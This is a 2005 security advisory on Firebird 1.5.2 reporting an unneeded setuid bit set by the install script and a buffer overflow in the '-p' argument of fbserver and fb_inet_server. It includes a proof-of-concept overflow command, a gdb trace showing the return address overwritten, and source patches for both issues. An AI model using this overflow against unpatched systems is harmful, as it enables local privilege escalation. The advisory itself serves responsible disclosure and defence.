--------------------------------------------------------------------------- Buffer Overflow and Installation Script Error in Firebird 1.5.3 --------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2005-02-18 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Product: Firebird Vulnerable Version: 1.5.2.4731 Description: Firebird is a relational database offering many ANSI SQL-99 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names since 1981. Web : http://firebird.sourceforge.net --------------------------------------------------------------------------- Vulnerability List: ~~~~~~~~~~~~~~~~~~~ A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries Vulnerabilities: ~~~~~~~~~~~~~~~~ A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server and fbserver suid firebird but this is unnecesary. If you takes a look to the install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see the following lines: (...) # SUID is still needed for group direct access. General users # cannot run though. for i in fb_lock_mgr gds_drop fb_inet_server do if [ -f $i ] then chmod ug=rx,o= $i chmod ug+s $i fi done (...) but, as the author says the fb_inet_server (at least) doesn't need to be suid firebird. The following is a fragment of Alex Peshkov (a Firebird developer) response about this problem: They need not and should not be set*id. And in standard precompiled binaries fbserver is not setuid. But for unknown to me reasons fb_inet_server is made setuid 'firebird' by install script (Debian guys fixed it, I think). I've noticed it, unfortunately, after release of 1.5.2, but definitely will fix it in future releases. Except security vulnerability this brings additional problem when one wants to change fb_inet_server run-user - changing only xinetd.d entry is not enough. - Debian distributions are not vulnerable to this problem. As the Alex Peshkov says Debian people has been fixed it. B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable to buffer overflows. If an string of more than 150 characters is passed to the '-p' parameter of any of these binaries the program will crash with a "Segmentation Fault" message. - The following is a test of the vulnerability: /usr/lib/firebird2/bin$ ls fb_lock_print fbguard fbmgr fbmgr.bin fbserver gsec /usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234 Segmentation fault The program dies abruptly. The bytes passeds from position 155 to 159 overwrites the return address: /usr/lib/firebird2/bin$ gdb ./fbserver GNU gdb 6.3 (...) (gdb) run -p `perl -e 'print "a"x155;'`4321 Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print "a"x155;'`4321 (...) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1210892160 (LWP 25358)] 0x31323334 in ?? () We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34, the numbers 4 3 2 1 in reverse order. (gdb) where #0 0x31323334 in ?? () #1 0x08233496 in ?? () #2 0x00000000 in ?? () #3 0xbffff9b0 in ?? () #4 0x00006161 in ?? () #5 0x00000000 in ?? () #6 0x00000000 in ?? () #7 0x00000000 in ?? () #8 0x00000000 in ?? () #9 0x00000000 in ?? () #10 0xbffff9b0 in ?? () #11 0x00000000 in ?? () #12 0x00000000 in ?? () #13 0x00000000 in ?? () #14 0xbffffb04 in ?? () #15 0x0804e370 in ?? () #16 0x00000000 in ?? () #17 0xbffffd50 in ?? () #18 0x00000000 in ?? () #19 0x00000000 in ?? () #20 0x00000000 in ?? () #21 0x00000000 in ?? () #22 0x00000000 in ?? () Notes: ~~~~~~ - Various other problems, not discovered by me, has been fixed in the 1.5.3 version. I encourage to upgrade to the newest version as soon as possible. Patches for the 1.5.2 version: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - The following are patches to solve ONLY the problems that I have been found. Patch for installation script: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --------------------START OF THE PATCH---------------------------- --- scripts/postinstall.sh 2005-03-25 14:24:40.091819144 +0100 +++ scripts/postinstall.sh.corrected 2005-03-25 14:08:47.777592912 +0100 @@ -401,7 +401,7 @@ # SUID is still needed for group direct access. General users # cannot run though. - for i in fb_lock_mgr gds_drop fb_inet_server + for i in fb_lock_mgr gds_drop do if [ -f $i ] then @@ -508,7 +508,7 @@ # SUID is still needed for group direct access. General users # cannot run though. - for i in fb_lock_mgr gds_drop fb_inet_server + for i in fb_lock_mgr gds_drop do if [ -f $i ] then ---------------------END OF THE PATCH------------------------------ Patch for fb_inet_server and/or fbserver buffer overflow: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --------------------START OF THE PATCH---------------------------- --- src/remote/inet_server.cpp 2004-09-29 12:03:39.000000000 +0200 +++ src/remote/inet_server.cpp.corrected 2005-03-25 14:17:59.698688152 +0100 @@ -32,7 +32,7 @@ * */ /* -$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $ +$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $ */ #include "firebird.h" #include "../jrd/ib_stdio.h" @@ -277,7 +277,10 @@ break; case 'P': - sprintf(protocol, "/%s", *argv++); + protocol[0] = '/'; + protocol[1] = 0; + strncat(protocol, *argv++, + sizeof(protocol) - strlen(protocol) - 1); break; case 'H': @@ -407,12 +410,9 @@ /* before starting the superserver stuff change directory to tmp */ if (CHANGE_DIR(TEMP_DIR)) { - char err_buf[1024]; - /* error on changing the directory */ - sprintf(err_buf, "Could not change directory to %s due to errno %d", + gds__log("Could not change directory to %s due to errno %d", TEMP_DIR, errno); - gds__log(err_buf); } /* Server tries to attash to security.fdb to make sure everything is OK ---------------------END OF THE PATCH------------------------------ The fix: ~~~~~~~~ The problems are fixed, in the current 1.5.3 version of the Firebird binary distribution. Thanks ~~~~~~ Thanks to Alex Peshkov, he where very kind and professional. Timeline: ~~~~~~~~~ 2005-02-18: Initial contact. 2005-02-11: Contact with Alex Peshkov. 2005-03-25: BOF (and various others) fixed in CVS. 2005-03-25: Wait for ~2 months after the 1.5.3 release. 2006-01-25: Firebird 1.5.3 released. 2006-03-12: Public disclosure. Disclaimer: ~~~~~~~~~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es